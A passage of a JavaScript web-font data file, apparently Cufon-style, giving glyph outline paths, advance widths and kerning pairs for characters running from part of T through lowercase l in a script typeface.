xm630,124v-1,27,-32,42,-57,42v-82,0,-141,-70,-183,-210v-42,-141,-43,-297,-41,-473v0,-1,8,-139,25,-414v6,-93,31,-140,76,-141v35,-1,53,19,53,60v0,35,-37,162,-40,180v-37,235,-36,497,11,763v10,57,28,96,41,118v21,33,51,51,90,54v17,2,25,9,25,21","w":870,"k":{"\u00d0":260,"\u00c1":196,"\u00c2":209,"\u00c0":428,"\u00a2":-164,"\u00d1":236,"\u00c9":257,"~":353,"z":177,"y":237,"x":109,"w":207,"v":229,"u":173,"t":282,"s":216,"r":162,"q":188,"p":96,"o":222,"n":130,"m":99,"l":-191,"k":-189,"j":261,"i":-115,"h":-147,"g":232,"e":203,"d":128,"c":215,"b":-135,"a":116,"`":-124,"Z":-100,"Y":-243,"X":-231,"W":-48,"V":-116,"U":-199,"T":-237,"S":-29,"R":-223,"Q":-135,"P":-235,"O":-135,"N":-79,"M":-104,"L":-95,"K":-248,"J":-174,"I":-259,"H":-129,"G":-54,"F":-124,"E":-105,"D":-69,"B":-63,"A":67,"@":310,";":207,":":338,"9":-46,"7":-220,"6":55,"5":-71,"4":-49,"2":25,"1":-100,"0":-97,"\/":85,".":330,"-":284,",":176,")":-68,"(":-31,"&":132,"%":67,"$":-193,"#":298,"!":-74}},"U":{"d":"1002,-1v0,53,-50,98,-101,98v-83,0,-141,-79,-175,-236v-24,-116,-36,-272,-25,-423v-53,153,-129,304,-230,454v-121,181,-228,271,-319,271v-77,0,-123,-67,-122,-147v2,-185,125,-559,181,-756v39,-138,58,-229,58,-272v0,-26,-9,-39,-27,-39v-24,0,-65,27,-118,86v-18,20,-87,123,-125,123v-20,0,-37,-15,-51,-45v2,-29,34,-69,95,-120v49,-42,96,-75,140,-98v28,-15,58,-23,89,-23v53,0,89,77,89,135v0,85,-41,252,-123,501v-73,222,-110,387,-110,496v0,57,6,85,18,85v106,0,256,-205,449,-616v30,-64,59,-153,92,-265v7,-25,24,-62,30,-114v8,-68,7,-113,10,-132v12,-60,35,-90,69,-90v35,0,53,20,53,59v0,24,-29,139,-29,146v-29,164,-48,208,-32,449r19,286v10,143,40,215,89,215v22,0,38,-17,49,-51v5,-16,13,-24,26,-24v21,0,31,16,31,47","w":1021,"k":{"\u00d0":61,"\u00c2":-30,"\u00c0":315,"\u00d1":37,"\u00c9":-85,"~":160,"z":-134,"y":-82,"x":-118,"w":-99,"v":26,"u":-139,"t":79,"s":-104,"r":-125,"q":-133,"p":-112,"o":-109,"n":-155,"m":-191,"l":-78,"k":-109,"j":65,"i":-71,"h":-117,"g":-87,"e":-128,"d":-89,"c":-116,"b":-117,"a":-128,"`":118,"Z":-126,"X":-154,"V":26,"U":-70,"S":-43,"R":-31,"Q":-101,"P":-28,"O":-108,"L":-111,"K":-155,"J":78,"I":-69,"H":-37,"G":-104,"D":-27,"C":-122,"B":-125,"A":-93,"@":108,"?":60,";":83,"9":69,"8":-42,"7":-43,"6":-91,"5":-130,"4":23,"3":-138,"2":-152,"1":-37,"0":-82,"\/":-78,"-":84,",":44,")":27,"(":-55,"&":21,"%":-96,"#":119,"!":50}},"V":{"d":"959,-820v-79,209,-138,389,-175,540v-28,115,-61,236,-98,365v-13,43,-47,65,-104,65v-58,0,-110,-83,-155,-250v-13,-47,-36,-156,-68,-327v-68,-363,-128,-545,-181,-545v-31,0,-74,38,-127,114v-53,76,-90,114,-110,114v-32,0,-48,-16,-48,-48v-11,-46,200,-227,237,-237v33,-9,59,-18,82,-18v59,0,111,62,151,188v53,164,81,409,131,678v29,155,57,232,77,232v24,0,48,-51,72,-154v45,-193,99,-386,162,-579v97,-299,175,-448,232,-448v22,0,68,35,51,59v-50,72,-93,156,-129,251","w":1040,"k":{"\u00d0":45,"\u00c1":261,"\u00c2":147,"\u00c0":465,"\u00a2":-96,"\u00d1":22,"\u00c9":191,"~":39,"z":64,"y":90,"x":-46,"w":63,"v":-26,"u":68,"t":69,"s":44,"r":-24,"q":90,"p":31,"o":92,"n":40,"m":-34,"l":-130,"k":-123,"j":84,"i":-49,"h":-82,"g":118,"f":42,"e":82,"d":149,"c":87,"b":-65,"a":118,"`":-62,"Z":-26,"Y":-163,"X":-173,"W":-91,"V":-92,"U":-132,"T":-160,"S":-38,"R":-171,"Q":-56,"P":-171,"O":-58,"N":-105,"M":-115,"L":-28,"K":-183,"J":-110,"I":-184,"H":-72,"F":-135,"E":-133,"D":-141,"B":-137,"A":71,"@":80,"?":-52,";":301,":":225,"8":-79,"7":-164,"6":55,"5":-49,"3":39,"2":-111,"1":-53,"0":-42,"\/":159,".":264,"-":70,",":273,"(":33,"&":146,"%":141,"$":-129}},"W":{"d":"1022,-1182v-3,-49,115,-98,170,-98v91,0,168,59,227,177v55,110,80,205,80,337v0,195,-30,387,-90,576v-75,235,-174,353,-296,353v-127,0,-225,-132,-293,-396v-47,-186,-71,-371,-71,-556v0,-3,1,-9,2,-16v-27,25,-93,151,-196,376v-61,133,-111,278,-151,434v-7,27,-11,52,-13,73v-6,67,-22,106,-50,112v-47,10,-77,-11,-72,-62r21,-274v0,-222,-2,-366,-7,-431v-16,-221,-51,-331,-104,-331v-29,0,-70,30,-114,94r-94,137v-27,36,-52,55,-77,57r-40,-29v2,-50,46,-119,133,-207v87,-88,153,-131,199,-131v88,0,148,73,175,221v27,149,24,359,12,583v61,-173,127,-332,200,-477v94,-187,166,-281,217,-281v63,0,81,64,48,111v-3,20,-4,46,-4,79v0,163,23,335,70,514v57,215,125,323,205,323v90,0,164,-103,223,-310v45,-159,68,-302,68,-428v0,-129,-13,-241,-40,-336v-41,-145,-106,-217,-197,-217v-28,0,-58,17,-90,51v-46,-1,-30,2,-51,-28","w":1560,"k":{"\u00d0":-75,"\u00c1":149,"\u00c2":45,"\u00c0":350,"\u00a2":-137,"\u00d1":-100,"\u00c9":76,"z":-33,"x":-101,"w":-42,"v":-116,"u":-47,"t":-44,"s":-77,"r":-100,"q":-21,"p":-43,"o":-33,"n":-60,"m":-134,"l":-81,"k":-96,"j":60,"i":-47,"h":-66,"f":-70,"e":-42,"d":50,"c":-38,"b":-90,"Y":-102,"X":-32,"W":-129,"V":-118,"U":-115,"T":-118,"S":-108,"R":-150,"Q":-103,"P":-146,"O":-106,"N":-144,"M":-139,"L":46,"K":-156,"I":-91,"H":-44,"G":-89,"F":-130,"E":-144,"D":-168,"C":-92,"B":-184,"A":-40,"@":-25,"?":-83,";":200,":":111,"9":-70,"8":-138,"7":-52,"6":-48,"5":-77,"4":-56,"3":-34,"2":-143,"1":-54,"0":-112,"\/":87,".":149,"-":-52,",":217,")":118,"(":-42,"&":53,"%":69,"$":-123}},"X":{"d":"986,-132v0,59,-92,103,-157,103v-89,0,-188,-56,-278,-183r-208,-294v-97,135,-164,232,-200,292v-81,134,-121,240,-121,319v0,14,12,36,37,67r-24,35v-33,-4,-60,-27,-83,-69v-18,-33,-27,-63,-27,-88v0,-53,32,-133,96,-241v43,-73,103,-160,179,-262v64,-87,96,-131,96,-132v-19,-55,-222,-374,-284,-477v-38,-63,-56,-102,-56,-115v0,-39,19,-58,57,-58v23,0,45,14,61,45v91,171,177,373,282,523r264,-311v161,-187,257,-280,288,-280v22,-1,53,26,53,50v0,15,-5,27,-14,37r-296,303v-163,168,-244,262,-244,281v0,15,50,89,151,223v125,167,226,251,303,251v18,0,35,-9,51,-28v16,-19,29,-28,40,-28v23,0,34,12,34,37","w":1017,"k":{"\u00d0":304,"\u00c1":108,"\u00c2":37,"\u00c0":345,"\u00a2":139,"\u00d1":285,"\u00c9":21,"~":397,"z":-27,"y":-23,"x":-21,"w":-35,"v":81,"u":-70,"t":121,"r":-49,"q":-61,"p":-36,"o":-50,"n":-73,"m":-122,"l":-46,"k":-76,"j":140,"i":-31,"h":-63,"g":-26,"f":70,"e":-67,"c":-61,"b":-87,"a":-39,"`":200,"Z":-31,"Y":41,"X":-72,"W":243,"V":212,"T":97,"R":100,"Q":-84,"P":56,"O":-89,"N":147,"M":155,"L":67,"K":-121,"J":86,"I":39,"H":55,"G":-77,"F":27,"E":56,"D":54,"C":-92,"B":-26,"@":76,"?":181,";":196,":":135,"9":276,"8":29,"7":38,"6":-49,"4":161,"3":-86,"1":62,"0":-69,"\/":43,".":95,"-":324,",":189,")":152,"&":36,"%":26,"$":124,"#":178,"!":103}},"Y":{"d":"789,-1115r-2,-105v0,-39,16,-59,49,-59v37,0,70,100,98,301v21,147,31,250,31,307v0,267,-12,480,-37,639v-37,237,-107,438,-211,603v-111,176,-257,264,-440,264v-69,0,-136,-28,-199,-85v-61,-55,-107,-121,-131,-200v-10,-35,-2,-69,29,-54v10,5,24,21,42,50v81,133,165,199,252,199v190,0,340,-131,451,-393v75,-178,121,-370,136,-577v24,-322,29,-457,-18,-731v-10,30,-32,103,-67,219v-57,188,-143,369,-257,545v-118,182,-222,273,-311,273v-84,0,-126,-54,-126,-163v0,-173,143,-575,197,-775v25,-93,36,-160,36,-200v0,-52,-11,-78,-32,-78v-23,0,-79,41,-167,122v-88,81,-138,122,-151,122v-30,0,-45,-17,-45,-50v0,-31,53,-85,158,-162v105,-77,179,-115,222,-115v75,0,113,43,113,128v0,192,-143,585,-200,794v-26,94,-36,165,-36,212v0,62,14,93,42,93v46,0,129,-102,249,-307v209,-356,317,-628,325,-817","w":910,"k":{"\u00d0":-222,"\u00c1":-64,"\u00c2":-129,"\u00c0":-82,"\u00a2":-262,"\u00d1":-246,"\u00c9":-145,"~":-118,"z":-208,"y":-279,"x":-228,"w":-196,"v":-250,"u":-225,"t":-194,"s":-233,"r":-231,"q":-202,"p":-194,"o":-209,"n":-227,"m":-285,"l":-213,"k":-241,"j":-506,"i":-198,"h":-216,"g":-185,"f":-232,"e":-225,"d":-160,"c":-220,"b":-246,"a":-207,"`":-110,"Z":-201,"Y":-213,"X":-233,"W":-263,"V":-240,"U":-236,"T":-241,"S":-242,"R":-272,"Q":-253,"P":-268,"O":-256,"N":-267,"M":-262,"L":-212,"K":-290,"J":-466,"I":-224,"H":-237,"G":-239,"F":-255,"E":-264,"D":-290,"C":-251,"B":-311,"A":-214,"@":-167,"?":-205,";":-61,":":-59,"9":-212,"8":-265,"7":-191,"6":-207,"5":-233,"4":-232,"3":-244,"2":-272,"1":-189,"0":-256,"\/":-178,".":-73,"-":-198,",":-81,")":-97,"(":-193,"&":-123,"%":-195,"$":-240,"#":-131,"!":-124}},"Z":{"d":"935,-1152v109,-3,228,49,225,146v0,31,-11,60,-29,90v-16,27,-62,32,-54,-12v12,-65,16,-94,16,-86v0,-39,-55,-59,-165,-59v-73,0,-173,15,-300,44v-77,18,-212,54,-405,108v-50,14,-84,21,-103,21v-37,0,-55,-19,-55,-56v0,-20,17,-37,52,-50v57,-21,129,-40,218,-55v288,-48,396,-85,600,-91xm835,-176v138,-3,289,101,289,234v0,25,-7,58,-29,95v-17,28,-62,26,-60,-16v1,-25,14,-44,14,-75v0,-90,-137,-146,-239,-146v-93,0,-192,15,-297,46v-6,-3,-484,175,-512,175v-58,0,-87,-33,-87,-100v0,-53,43,-126,130,-220v53,-57,116,-117,185,-184v42,-41,777,-671,810,-671v23,0,57,26,57,52v0,14,-60,69,-180,164v-611,487,-917,767,-917,840v0,9,8,14,25,14v4,0,29,-8,75,-22v206,-62,519,-181,736,-186","w":974,"k":{"\u00d0":358,"\u00c1":-146,"\u00c2":-150,"\u00c0":101,"\u00a2":-225,"\u00d1":332,"\u00c9":-258,"~":45,"z":-240,"y":-202,"x":-248,"w":-206,"v":-54,"u":-243,"t":-32,"s":-213,"r":-237,"q":-252,"p":-239,"o":-211,"n":-263,"m":-297,"l":-248,"k":-249,"j":-73,"i":-196,"h":-262,"g":-206,"f":-124,"e":-231,"d":-229,"c":-218,"b":-256,"a":-246,"`":-236,"Z":-270,"Y":-316,"X":-302,"W":-176,"V":-227,"U":-289,"T":-313,"S":-180,"R":-327,"Q":-239,"P":-328,"O":-241,"N":-207,"M":-226,"L":-290,"K":-311,"J":-214,"I":-310,"H":-315,"G":-240,"F":-285,"E":-266,"D":-234,"C":-258,"B":-270,"A":-262,"?":-160,";":-111,":":-86,"9":-236,"8":-178,"7":-274,"6":-228,"5":-277,"4":-114,"3":-273,"2":-299,"1":-257,"0":-218,"\/":-245,".":-186,"-":388,",":-223,")":-167,"(":-192,"&":-113,"%":-263,"$":-258,"!":-139}},"[":{"d":"668,-1225v-12,-33,-64,-50,-155,-50v-95,0,-189,17,-283,51v-26,10,-47,13,-62,10v-22,-4,-32,-16,-28,-37v6,-30,34,-51,84,-63v170,-39,275,-54,417,-9v65,20,97,51,97,87v0,35,-8,53,-25,53v-19,0,-34,-14,-45,-42xm397,-2v83,0,162,-5,233,19v69,23,104,56,104,99v0,37,-12,41,-60,40v-10,-57,-67,-86,-170,-86v-38,0,-85,5,-140,18v-38,9,-77,-4,-77,-40v0,-11,5,-20,14,-28v-52,-69,-78,-229,-78,-480v0,-205,16,-393,37,-565v5,-42,9,-105,20,-188v3,-22,38,-63,64,-63v39,0,55,24,47,71v-43,265,-86,548,-86,851v0,235,31,352,92,352","w":737},"\\":{},"]":{"d":"223,-1282v-110,4,-196,10,-257,26v-32,8,-47,-23,-38,-57v9,-34,106,-51,285,-51v189,0,291,27,311,79v14,36,-22,43,-53,34v-82,-24,-165,-34,-248,-31xm359,82v-108,23,-202,51,-280,85v-33,14,-53,22,-60,22v-34,0,-51,-18,-51,-53v0,-39,108,-81,325,-126v-47,-66,-70,-208,-70,-427v0,-189,17,-399,45,-633v5,-42,8,-105,20,-187v3,-24,38,-63,64,-63v39,0,55,23,48,70v-46,270,-97,644,-97,907v0,210,30,315,89,315v25,0,37,11,37,34v0,27,-23,46,-70,56","w":737},"^":{},"_":{},"`":{"d":"442,-786v-9,15,-24,18,-45,10v-83,-32,-138,-54,-165,-67v-79,-35,-127,-66,-142,-91v-17,-30,-1,-52,34,-64v27,-9,45,-7,54,4v42,53,124,108,245,167v23,11,30,24,19,41","w":626,"k":{"\u00d0":502,"\u00c1":473,"\u00c2":396,"\u00c0":379,"\u00d1":457,"\u00c9":552,"~":162,"z":452,"y":285,"x":523,"w":488,"v":443,"u":473,"t":228,"s":461,"r":493,"q":438,"p":496,"o":491,"n":458,"m":431,"l":58,"k":52,"j":77,"i":239,"h":94,"g":443,"f":208,"e":467,"d":567,"c":477,"b":90,"a":457,"`":277,"Z":474,"Y":110,"X":187,"W":20,"V":-56,"U":82,"T":84,"S":77,"R":20,"Q":85,"P":29,"O":86,"N":-26,"M":-63,"L":183,"J":180,"I":231,"H":188,"G":125,"E":-37,"D":-50,"C":179,"A":491,"@":285,";":543,":":455,"9":108,"8":58,"7":302,"6":218,"5":113,"4":169,"3":163,"2":-30,"1":92,"0":75,"\/":538,".":396,"-":525,",":464,")":368,"(":156,"&":271,"%":470,"#":116,"!":153}},"a":{"d":"761,-85v0,81,-83,126,-163,96v-63,-23,-95,-97,-95,-222v0,-13,0,-27,1,-41v-66,88,-139,168,-218,241v-102,93,-182,140,-241,140v-57,0,-87,-44,-86,-104v0,-83,44,-196,134,-337v86,-136,181,-247,284,-334v112,-95,195,-125,249,-90v25,16,38,50,38,101v0,61,-21,94,-63,98v-29,2,-44,-8,-44,-31v10,-33,20,-66,20,-93v0,-15,-2,-22,-5,-21v-66,12,-172,114,-320,306v-148,192,-222,323,-222,396v0,25,11,38,34,38v58,0,149,-75,273,-225v86,-104,133,-162,141,-173v38,-53,60,-101,65,-145v3,-30,19,-45,48,-45v41,0,57,20,49,59v-33,171,-49,276,-49,313v0,68,15,105,45,114v18,5,49,-11,51,-24v7,-29,23,-43,50,-43v16,0,24,9,24,26","w":734,"k":{"\u00d0":-66,"\u00c1":-26,"\u00c2":-85,"\u00c0":230,"\u00a2":-139,"\u00d1":-91,"\u00c9":-141,"z":-168,"y":-154,"x":-163,"w":-158,"v":-114,"u":-189,"t":-39,"s":-150,"r":-170,"q":-195,"p":-163,"o":-168,"n":-193,"m":-239,"l":-143,"k":-180,"i":-140,"h":-175,"g":-159,"f":-65,"e":-186,"d":-156,"c":-178,"b":-197,"a":-170,"`":384,"@":-26,"?":178,";":59,"9":-67,"8":-134,"7":-90,"6":-169,"5":-145,"4":-57,"3":-201,"2":-157,"1":-49,"0":-167,"\/":-114,".":-68,"-":-42,",":45,")":22,"(":-131,"&":-68,"%":-116,"$":-69}},"b":{"d":"198,-1129v28,0,74,30,60,65v-70,172,-108,278,-119,313v-69,212,-104,397,-104,554v0,33,4,63,12,90v68,-115,152,-216,253,-304v122,-107,236,-160,341,-160v78,0,163,58,163,134v0,105,-76,232,-227,381v-151,149,-276,224,-375,224v-81,0,-122,-30,-122,-91v0,-33,17,-66,48,-100v12,-13,54,-20,54,4v0,23,-46,74,-40,86v0,17,13,26,38,26v83,0,196,-71,337,-213v140,-140,210,-248,210,-323v0,-41,-27,-61,-82,-61v-131,0,-302,135,-494,388r-8,14v-42,71,-73,106,-94,106v-44,0,-78,-29,-86,-91v-28,-227,8,-363,85,-674v61,-246,113,-368,150,-368","w":854,"k":{"\u00d0":-118,"\u00c1":114,"\u00c2":33,"\u00c0":317,"\u00a2":-62,"\u00d1":-141,"\u00c9":138,"~":649,"x":55,"w":-37,"v":-65,"u":-56,"t":-32,"s":-78,"r":-66,"p":-48,"o":-35,"n":-70,"m":-143,"l":-41,"k":-69,"j":104,"i":-28,"h":-40,"f":-47,"e":-29,"d":103,"c":-33,"b":-68,"a":43,"`":564,"?":180,";":180,":":90,"9":-37,"7":127,"6":-27,"5":-61,"4":-27,"3":63,"2":126,"1":66,"0":-85,"\/":172,".":212,"-":-94,",":274,")":252,"(":-21,"&":89,"%":154,"$":-40,"#":35,"!":48}},"c":{"d":"172,97v-128,5,-202,-98,-201,-230v0,-98,44,-217,132,-358v101,-162,209,-243,322,-244v19,0,48,8,85,25v49,21,72,48,76,78v3,24,-28,44,-46,44v-15,0,-34,-12,-57,-36v-23,-24,-45,-36,-68,-36v-82,0,-166,76,-251,227v-75,134,-113,239,-113,314v0,84,35,126,106,126v70,0,139,-23,208,-69v63,-43,118,-99,163,-169v11,-18,28,-12,39,5v7,11,10,19,8,26v-5,21,-43,66,-112,134v-63,62,-102,97,-116,104v-99,51,-95,56,-175,59","w":676,"k":{"\u00d0":338,"\u00c1":176,"\u00c2":60,"\u00c0":411,"\u00a2":-68,"\u00d1":314,"\u00c9":82,"~":70,"z":62,"x":-27,"v":-58,"u":-35,"t":142,"s":67,"r":-43,"q":-38,"o":-22,"n":-31,"m":-93,"l":-23,"k":-55,"j":232,"h":-35,"f":95,"e":-41,"d":20,"c":-33,"b":-64,"`":500,"@":51,"?":192,";":285,":":231,"8":-82,"7":80,"6":-36,"5":49,"4":-49,"2":83,"1":88,"0":-64,"\/":89,".":156,"-":368,",":213,")":215,"&":56,"%":88,"$":143,"#":223,"!":70}},"d":{"d":"807,35v0,29,-52,59,-82,59v-97,0,-145,-111,-145,-334v0,-20,1,-44,2,-72r-37,46v-214,271,-370,407,-467,407v-79,0,-121,-26,-120,-102v0,-56,30,-142,89,-258v63,-124,134,-230,214,-316v95,-102,183,-153,263,-153v31,0,62,11,94,34r59,-318v25,-134,52,-201,83,-201v24,-1,57,27,55,53v0,3,-8,33,-25,88v-85,289,-127,567,-127,833v0,153,23,230,69,230v3,-1,8,-5,15,-9v7,-4,22,-11,43,-21v11,11,17,23,17,34xm590,-526v0,-38,-25,-87,-55,-93v-75,-13,-180,76,-315,268v-128,182,-192,311,-192,387v0,19,7,28,22,28v58,0,156,-70,295,-209v125,-126,199,-216,223,-270v15,-33,22,-70,22,-111","w":863,"k":{"\u00d0":20,"\u00c0":333,"\u00a2":-60,"~":76,"z":-109,"y":-46,"x":-99,"w":-71,"v":-31,"u":-111,"t":41,"s":-79,"r":-102,"q":-103,"p":-93,"o":-74,"n":-131,"m":-165,"l":-50,"k":-87,"j":80,"i":-41,"h":-101,"g":-49,"e":-94,"d":-68,"c":-79,"b":-28,"a":-104,"@":66,"?":-20,";":99,":":42,"8":-59,"7":-81,"6":-69,"5":-116,"3":-106,"2":-140,"1":-23,"0":-50,"\/":-66,".":58,"-":44,",":61,")":38,"(":-30,"&":65,"%":-84,"$":-75,"#":40,"!":63}},"e":{"d":"198,-262v-43,0,-74,-10,-96,-29v-27,24,-59,179,-59,238v0,52,34,78,103,78v66,0,143,-38,232,-115v86,-75,146,-152,179,-231r32,0v13,12,17,23,13,34v-39,112,-104,205,-194,279v-86,71,-172,107,-259,107v-130,1,-195,-99,-187,-236v6,-100,59,-224,160,-372v109,-159,208,-238,297,-238v51,0,87,55,87,107v0,65,-28,140,-83,225v-66,102,-140,153,-225,153xm407,-677v-25,6,-48,21,-69,46v-139,163,-208,257,-208,284v0,7,15,12,46,14v52,3,109,-35,170,-112v60,-75,90,-143,90,-202v0,-25,-10,-35,-29,-30","w":626,"k":{"\u00c1":86,"\u00c2":-34,"\u00c0":275,"\u00a2":-95,"\u00c9":27,"~":64,"z":-21,"y":-105,"x":-47,"w":-107,"v":-71,"u":-123,"t":31,"s":-133,"r":-117,"q":-103,"p":-111,"o":-110,"n":-124,"m":-192,"l":-117,"k":-154,"j":164,"i":-110,"h":-128,"g":-86,"f":-145,"e":-116,"d":-43,"c":-114,"b":-161,"a":-57,"`":433,"@":-68,"?":96,";":198,":":311,"9":-86,"8":-95,"6":-131,"4":-138,"3":-69,"2":-50,"0":-168,"\/":24,".":101,"-":47,",":164,")":148,"(":-108,"&":-26,"%":22,"$":-24,"#":59,"!":-20}},"f":{"d":"441,-1166v80,0,157,116,157,198v0,51,-11,82,-34,91v-28,-7,-30,-55,-33,-89v-5,-49,-56,-134,-105,-134v-69,0,-123,84,-161,251v-19,85,-34,215,-45,390v13,-2,88,-20,111,-20v59,0,97,22,116,67v8,17,8,47,-9,52v-10,3,-22,-3,-37,-20v-36,-42,-84,-43,-141,-20v-50,20,-57,15,-57,85v0,42,29,361,29,395v0,44,-18,66,-54,66v-41,0,-46,-36,-46,-86v0,-32,-3,-166,-9,-401v-21,11,-56,30,-104,59v-17,11,-29,16,-34,16v-23,0,-35,-17,-35,-50v0,-11,3,-18,8,-23v13,-14,98,-57,172,-91v20,-227,38,-373,55,-438v49,-199,135,-298,256,-298","w":496,"k":{"\u00d0":-119,"\u00c1":111,"\u00c0":460,"\u00a2":-199,"\u00d1":-135,"\u00c9":149,"~":183,"z":75,"y":-47,"x":71,"w":-59,"v":-47,"u":-70,"t":-59,"s":-98,"r":-81,"p":-67,"o":-52,"n":-75,"m":-151,"l":-186,"k":-191,"j":91,"i":-138,"h":-151,"f":-66,"e":-43,"d":67,"c":-46,"b":-148,"a":43,"`":-145,"@":-32,"?":-116,";":213,":":114,"9":-91,"8":-84,"7":-198,"6":-81,"5":-155,"4":-75,"3":-66,"2":-113,"1":-160,"0":-145,"\/":84,".":222,"-":-95,",":185,")":-34,"(":-73,"&":49,"%":66,"$":-232,"#":50,"!":-82}},"g":{"d":"532,-798v67,0,115,87,115,155v0,56,-15,84,-46,84v-37,0,-53,-34,-48,-101v3,-42,-5,-63,-23,-63v-49,0,-116,48,-201,145v-62,71,-111,137,-147,198v-46,51,-136,216,-135,298v0,29,5,43,15,43v49,0,112,-42,190,-126v29,-31,92,-108,191,-233v66,-84,109,-126,128,-126v45,0,79,66,102,198v51,295,16,597,-103,804v-85,148,-184,223,-300,223v-162,0,-333,-197,-333,-358v0,-39,13,-58,39,-58v19,0,28,11,28,34v0,139,119,297,249,297v132,0,230,-98,293,-293v41,-125,61,-249,61,-373v0,-248,-22,-372,-66,-372v-3,0,-18,21,-46,64v-83,126,-141,208,-173,245v-85,99,-164,149,-235,149v-71,0,-118,-60,-117,-133v0,-112,72,-257,214,-435v142,-178,258,-266,348,-266","w":770,"k":{"\u00d0":-63,"\u00a2":-93,"\u00d1":-86,"\u00c9":-50,"~":64,"z":-104,"y":-206,"x":-102,"w":-76,"v":-77,"u":-112,"t":-42,"s":-89,"r":-96,"q":-97,"p":-88,"o":-91,"n":-125,"m":-163,"l":-77,"k":-110,"j":-435,"i":-72,"h":-100,"g":-77,"f":-100,"e":-108,"d":-90,"c":-101,"b":-125,"a":-103,"`":484,";":24,":":41,"9":-72,"8":-100,"7":-26,"6":-96,"5":-107,"4":-100,"3":-129,"2":-132,"1":-100,"0":-124,"\/":-112,".":23,"-":-44,"(":-65,"%":-115,"$":-42,"#":27,"!":24}},"h":{"d":"684,9v0,32,-70,69,-101,69v-82,0,-135,-108,-155,-325v-5,-51,-10,-122,-23,-211v-8,-55,-21,-82,-36,-82v-39,0,-88,61,-149,184v-82,165,-129,319,-142,464v-2,25,-59,66,-76,27v-10,-25,-15,-111,-15,-256v0,-139,22,-339,65,-602v47,-288,90,-432,129,-432v33,0,50,16,50,49v0,1,-12,37,-35,110v-25,77,-42,145,-53,204v-42,243,-65,442,-70,599r9,-21v107,-263,205,-394,294,-394v75,0,123,109,141,327v4,52,9,123,23,213v9,56,25,83,44,83v25,5,56,-35,71,-35v19,0,29,10,29,29","w":694,"k":{"\u00d0":21,"\u00c2":-34,"\u00c0":310,"\u00a2":40,"\u00c9":-93,"~":491,"z":-138,"y":-76,"x":-111,"w":-90,"v":34,"u":-136,"t":63,"s":-99,"r":-122,"q":-126,"p":-114,"o":-104,"n":-162,"m":-194,"l":-56,"k":-88,"j":230,"i":-54,"h":-100,"g":-80,"f":24,"e":-121,"d":-69,"c":-110,"b":-97,"a":-126,"`":433,"@":89,"?":137,";":77,"9":63,"8":-22,"7":-27,"6":-71,"5":-114,"3":-119,"2":-136,"1":22,"0":-62,"\/":-60,".":-20,"-":43,",":47,")":47,"(":-35,"&":39,"%":-78,"$":66,"#":141,"!":71}},"i":{"d":"70,-924v0,-27,25,-60,55,-60v35,0,52,19,52,57v0,39,-18,58,-54,58v-27,0,-53,-32,-53,-55xm269,55v0,31,-55,65,-86,64v-63,0,-112,-49,-145,-148v-49,-145,-42,-247,-13,-418v21,-126,52,-188,90,-188v30,0,45,17,45,52v0,16,-10,46,-28,90v-20,48,-42,129,-42,245v0,55,1,87,0,98r26,124v17,55,43,82,77,82v8,0,13,-1,16,-4v9,-13,22,-23,39,-31v14,12,21,23,21,34","w":315,"k":{"\u00d0":33,"\u00c0":256,"\u00a2":-50,"\u00c9":71,"~":385,"z":-92,"y":106,"x":-101,"w":-63,"v":-35,"u":-105,"t":59,"s":-67,"r":-101,"q":-76,"p":-99,"o":-57,"n":-134,"m":-165,"l":-35,"k":-74,"j":-105,"i":-28,"h":-100,"g":41,"f":26,"e":-76,"d":-78,"c":-59,"b":-28,"a":-108,"`":82,"@":72,"?":75,";":76,":":60,"9":-41,"8":-48,"7":-22,"6":-65,"5":-116,"4":24,"3":-88,"2":-141,"1":-58,"0":-34,"\/":-83,".":143,"-":57,")":25,"(":-21,"&":96,"%":-98,"$":-29,"#":93,"!":56}},"j":{"d":"213,-787v-37,0,-56,-16,-56,-48v0,-27,14,-41,43,-41v39,0,59,12,59,36v0,35,-15,53,-46,53xm-157,717v-187,0,-353,-153,-348,-341v0,-32,11,-48,34,-48v23,0,34,13,32,38v-14,129,118,273,246,273v143,0,249,-111,316,-333v43,-140,64,-283,64,-429v0,-184,-17,-337,-49,-461v-9,-37,15,-86,55,-86v51,0,77,154,77,463v0,107,-2,182,-7,227v-17,171,-63,326,-137,463v-83,156,-178,234,-283,234","w":368,"k":{"\u00d0":-75,"\u00c1":44,"\u00a2":-83,"\u00d1":-99,"\u00c9":-23,"~":172,"z":-84,"y":-159,"x":-56,"w":-39,"v":-85,"u":-89,"t":-28,"s":-73,"r":-59,"q":-62,"p":-57,"o":-63,"n":-105,"m":-147,"l":-51,"k":-83,"j":-388,"i":-40,"h":-65,"g":-44,"f":-77,"e":-76,"d":-41,"c":-75,"b":-93,"a":-66,"`":125,"?":-21,";":51,":":64,"9":-49,"8":-83,"6":-62,"5":-71,"4":-75,"3":-94,"2":-96,"1":-57,"0":-99,"\/":-60,".":50,"-":-51,",":30,")":35,"(":-38,"&":28,"%":-69,"$":-61,"!":41}},"k":{"d":"447,-146v-107,-40,-204,-46,-329,-46v-29,0,-44,-22,-44,-65v0,-4,21,-27,63,-68v118,-117,199,-223,269,-405v14,-35,30,-52,48,-52v35,0,52,20,52,60v0,77,-102,222,-305,435v145,27,250,56,314,87v119,57,178,138,178,243v0,13,-4,31,-12,56v-11,33,-23,51,-37,54r-17,-4r2,2v-38,-16,2,-59,2,-88v0,-93,-61,-162,-184,-209xm137,-1173v19,0,62,36,51,65v-93,256,-134,512,-134,761v0,134,15,250,44,348v14,46,31,72,51,77v41,11,57,32,31,58v-8,7,-16,10,-25,8v-79,-18,-133,-85,-162,-200v-16,-63,-25,-156,-27,-281v-1,-55,16,-196,50,-424v41,-275,82,-412,121,-412","w":708,"k":{"\u00d0":198,"\u00c1":-24,"\u00c2":-35,"\u00c0":226,"\u00a2":35,"\u00d1":173,"\u00c9":-101,"~":168,"z":-130,"y":-89,"x":-121,"w":-94,"v":38,"u":-132,"t":90,"s":-100,"r":-123,"q":-138,"p":-122,"o":-103,"n":-152,"m":-186,"l":-59,"k":-91,"j":59,"i":-58,"h":-103,"g":-94,"f":35,"e":-122,"d":-67,"c":-111,"b":-110,"a":-130,"`":490,"@":98,"?":74,":":21,"9":-77,"8":-23,"7":-34,"6":-76,"5":-123,"4":34,"3":-128,"2":-151,"1":-101,"0":-74,"\/":-92,".":-29,"-":228,",":-58,"(":-40,"&":22,"%":-110,"$":69,"#":149,"!":51}},"l":{"d":"295,77v2,6,3,13,3,22v-23,29,-51,43,-86,43v-51,0,-95,-30,-133,-88v-54,-83,-74,-225,-74,-382v0,-174,10,-350,30,-528v23,-197,48,-296,76,-296v49,-1,54,42,46,92r-12,71v-44,235,-54,419,-54,703v0,243,43,365,128,365v15,0